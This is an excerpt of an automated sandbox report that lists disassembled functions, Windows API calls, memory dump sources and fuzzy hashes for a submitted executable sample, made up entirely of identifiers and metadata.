    • GetProcessAffinityMask.KERNEL32(00000000), ref: 000C23CA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: c80862ff5e3d2e50a22a99e64c64c3f81efcbf50ce60d98080ab35579212fd3b
    • Instruction ID: 453055281300e627fd8ebd50aaf83009b7d6484ddcd6bef0d88abef749fcf4fe
    • Opcode Fuzzy Hash: c80862ff5e3d2e50a22a99e64c64c3f81efcbf50ce60d98080ab35579212fd3b
    • Instruction Fuzzy Hash: 8FE09A32B10186A7DF098BA8AC89EAF72ECEB542047248179A603E3900E97CDE0546A0
    Function 000BB8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
    Download Yara Rule
    APIs
    • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: d36f6169eda9411548890dfef87fb6046ee55d46f35cdf5c68cf03c014256a08
    • Instruction ID: 126b383acc425e03405d6b1de52f2297de90c1acb01b9a1b5d1674f236ec1025
    • Opcode Fuzzy Hash: d36f6169eda9411548890dfef87fb6046ee55d46f35cdf5c68cf03c014256a08
    • Instruction Fuzzy Hash: D0F0A93110424ABBEF615FA0CC40BEA37ADBF047C5F008065BA44EA1A1DB75DD959A20
    Function 000BB470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
    Download Yara Rule
    APIs
    • DeleteFileW.KERNEL32(?,00000000,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB481
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB4AF
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DeleteFile$_wcslen
    • String ID:
    • API String ID: 2643169976-0
    • Opcode ID: f481c9571abecb63c84e889b41a644397eb39ee648311bfdfccfab2eed92338a
    • Instruction ID: 61abd4baf3d9f57e56cc7435792c998fa78a5b6ccfddcbcfa25f021c854f87dc
    • Opcode Fuzzy Hash: f481c9571abecb63c84e889b41a644397eb39ee648311bfdfccfab2eed92338a
    • Instruction Fuzzy Hash: 52E022325002496BEB109BA0CC44FEA339DBF04782F044035BA04D60A2DBB4DC88DA14
    Function 000CBD71 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
    Download Yara Rule
    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,?,000E37FF,000000FF), ref: 000CBDA5
    • CoUninitialize.COMBASE(?,?,?,?,000E37FF,000000FF), ref: 000CBDAA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: aed8c09e2bb2d36d49e0413cc8a303d74829a99d7604176badb5978c9ae52077
    • Instruction ID: 3363ad23d6cb9510badc43a5b0788c29b6feb10258e2cf96d0cd9af023f4fa11
    • Opcode Fuzzy Hash: aed8c09e2bb2d36d49e0413cc8a303d74829a99d7604176badb5978c9ae52077
    • Instruction Fuzzy Hash: 9BE06572604551EFC7119B49DC45B59FBA9FB89B20F04422AB41693760CB746801CA91
    Function 000BB4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • GetFileAttributesW.KERNEL32(?,?,?,000BB4CA,?,000B8042,?), ref: 000BB4E4
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,000BB4CA,?,000B8042,?), ref: 000BB510
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: 9b5d484dd9e79bf61e7ca6c0369404b941f5ea7d758f10085350326c54465748
    • Instruction ID: b3ed23b2c45cf6ea7562845902b32432d7982ea4a8299f4f5481a2dd198a2842
    • Opcode Fuzzy Hash: 9b5d484dd9e79bf61e7ca6c0369404b941f5ea7d758f10085350326c54465748
    • Instruction Fuzzy Hash: 22E0D8315002686BDB30AB68DC04FD9779CEB497E2F0101B0FE45F7191D7709E418AD0
    Function 000CEFF2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 000CF01C
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • SetDlgItemTextW.USER32(00000065,?), ref: 000CF033
      • Part of subcall function 000CC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
      • Part of subcall function 000CC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
      • Part of subcall function 000CC748: IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
      • Part of subcall function 000CC748: TranslateMessage.USER32(?), ref: 000CC78C
      • Part of subcall function 000CC748: DispatchMessageW.USER32(?), ref: 000CC796
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
    • String ID:
    • API String ID: 3954729096-0
    • Opcode ID: b02b25ac1a9930f6635e3f14bd97caba8f1cdb5723bba0d7516769ee2dab6730
    • Instruction ID: 648a3cf7b4812843df9727e4dc8a2cbc3e3ff724169b03812133efe6d2d758f6
    • Opcode Fuzzy Hash: b02b25ac1a9930f6635e3f14bd97caba8f1cdb5723bba0d7516769ee2dab6730
    • Instruction Fuzzy Hash: 08E068B250420C36EF02AB60DC0AFFE3AADAB053C9F040061B204E70A3D7B8D611DF22
    Function 000C1B34 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
    Download Yara Rule
    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
    • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    • Opcode ID: 69fca4c9e453082d8cc9cc39d706dd07ca3ec6b7a7b983c4225075214609ba5f
    • Instruction ID: 42351c796f40bcc4d760ab95022f276ac8651ee54cd0dbc9279b9f2ba33aee42
    • Opcode Fuzzy Hash: 69fca4c9e453082d8cc9cc39d706dd07ca3ec6b7a7b983c4225075214609ba5f
    • Instruction Fuzzy Hash: 3DE048768002686ADB1197A4DC48FDA77ACEF097C1F0400757645E2045DA74DA84CBF0
    Function 000CB3B8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
    Download Yara Rule
    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000CB3D9
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 000CB3E0
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    • Opcode ID: 7f2685e87673bf5f600afcd8bb396d02fd3883f5cf3593795f2658a83fa0732c
    • Instruction ID: aa0c5a0ded8b43bc2e73aeb6ec9db966d6ed0aa9f3702ed29b682480947dd518
    • Opcode Fuzzy Hash: 7f2685e87673bf5f600afcd8bb396d02fd3883f5cf3593795f2658a83fa0732c
    • Instruction Fuzzy Hash: EDE0ED71904658EFCB50DF59C941BDDB7F9EB04355F20806FE89693601D374AF049B91
    Function 000D3D0C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000D3D2A
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 000D3D35
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1660781231-0
    • Opcode ID: 061a54e0c2af7a5b666605310e7e514339808cf6f4195d3465b1d955c8ed6c24
    • Instruction ID: 9411210d6991202dad4c820c86e79dc57fdb249e496781d893e0f708fa31f107
    • Opcode Fuzzy Hash: 061a54e0c2af7a5b666605310e7e514339808cf6f4195d3465b1d955c8ed6c24
    • Instruction Fuzzy Hash: ABD0A92A80870415DC2826B478020EA338AAB12BB1BA02697E020CA7C3EB209600A933
    Function 000B12D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    • Opcode ID: b2ddc7c4fa45dfff79bd9be625c085d2c9fb3245ddf550e14d495a373862130d
    • Instruction ID: f4863d4751062b4aa5420fb41168a681f9bcb08f5edc0649867b333538bb9f7f
    • Opcode Fuzzy Hash: b2ddc7c4fa45dfff79bd9be625c085d2c9fb3245ddf550e14d495a373862130d
    • Instruction Fuzzy Hash: 41C01232098A00FECB020BB0DE09E6ABBAAABE4212F10CA08F0A6C1060C239C050DB11
    Function 000B1AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: ed1add446042968dc21cf01dc8f1ed31b856f45c304a2704f84c54db39dc5572
    • Instruction ID: 7448d913845818964280da2da2b0ef2f4362b3f97aea45a2f58c4a74fd5a5f56
    • Opcode Fuzzy Hash: ed1add446042968dc21cf01dc8f1ed31b856f45c304a2704f84c54db39dc5572
    • Instruction Fuzzy Hash: 47C18131A002549BDF65CF28C8E47ED7BE5AF4A710F9801BAEC059F396C7359A44CB61
    Function 000B90A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B90A7
      • Part of subcall function 000B13F8: __EH_prolog.LIBCMT ref: 000B13FD
      • Part of subcall function 000B2032: __EH_prolog.LIBCMT ref: 000B2037
      • Part of subcall function 000BB966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog$CloseFind
    • String ID:
    • API String ID: 2506663941-0
    • Opcode ID: d12b183de52ae237284a67d5be984bafd8406d18cad822835834c8d6399c7e75
    • Instruction ID: 71527d8b1baa5f0dd3b1c2a03604943401db212c0203dec59cb22bb05836ca07
    • Opcode Fuzzy Hash: d12b183de52ae237284a67d5be984bafd8406d18cad822835834c8d6399c7e75
    • Instruction Fuzzy Hash: EA419671D04214AEDB24EB64CCA5BEA77B9AF10340F4404EAF64AA7083DBB55F89DF11
    Function 000B13FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B13FD
      • Part of subcall function 000B6891: __EH_prolog.LIBCMT ref: 000B6896
      • Part of subcall function 000BE298: __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000B644D: __EH_prolog.LIBCMT ref: 000B6452
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: c9a9b0b06f7bf94bc6d81c0303fe2a10e5852663a4bbc97055d14dfa40b55866
    • Instruction ID: fd0e6ad78bee0509f54da3275f4f32c54eae3bc66e63fc0e7e65e63ad875153b
    • Opcode Fuzzy Hash: c9a9b0b06f7bf94bc6d81c0303fe2a10e5852663a4bbc97055d14dfa40b55866
    • Instruction Fuzzy Hash: 805147B1A0A3808ECB14DF6994802D9BBE5AF59300F0802BEEC5DCF79BD7755214CB62
    Function 000B13F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B13FD
      • Part of subcall function 000B6891: __EH_prolog.LIBCMT ref: 000B6896
      • Part of subcall function 000BE298: __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000B644D: __EH_prolog.LIBCMT ref: 000B6452
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 2d93b8ac286b1cb264e62f21a9632425e784163e9e79be9cf94d3c6b7287f09b
    • Instruction ID: 68cc23ab72082f1db021207b9cf0425e18dcac47fcf6f65ce6d24fce4aefabe0
    • Opcode Fuzzy Hash: 2d93b8ac286b1cb264e62f21a9632425e784163e9e79be9cf94d3c6b7287f09b
    • Instruction Fuzzy Hash: 985137B190A3808EDB14DF6994802D9BBE5BF59300F0802BEEC5DDF68BD7755214CB62
    Function 000C479D Relevance: 1.6, APIs: 1, Instructions: 89COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 18b44ef3aafc6c4d58ebc82bf42ea41b2ba8330ffb6f8dc1556e9fa6719d5096
    • Instruction ID: 0f414038cf86df210e8d465ed801d031f9e349276ed7810d91cc8c347b84130b
    • Opcode Fuzzy Hash: 18b44ef3aafc6c4d58ebc82bf42ea41b2ba8330ffb6f8dc1556e9fa6719d5096
    • Instruction Fuzzy Hash: 5121B9B5E40715AFDB14DF74CC52BAE7AA8FF14314F00453EE605EB682D774990086A9
    Function 000CC207 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000CC20C
      • Part of subcall function 000B13F8: __EH_prolog.LIBCMT ref: 000B13FD
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: f3689ca2e0e90d32448c58402ad199024d5897693851a90e7fecc8f272bdcdbb
    • Instruction ID: 252e6c461ef4d2e04a9ff4b55bb34b94c6c69ce39eb378d7efce0d3f38707a65
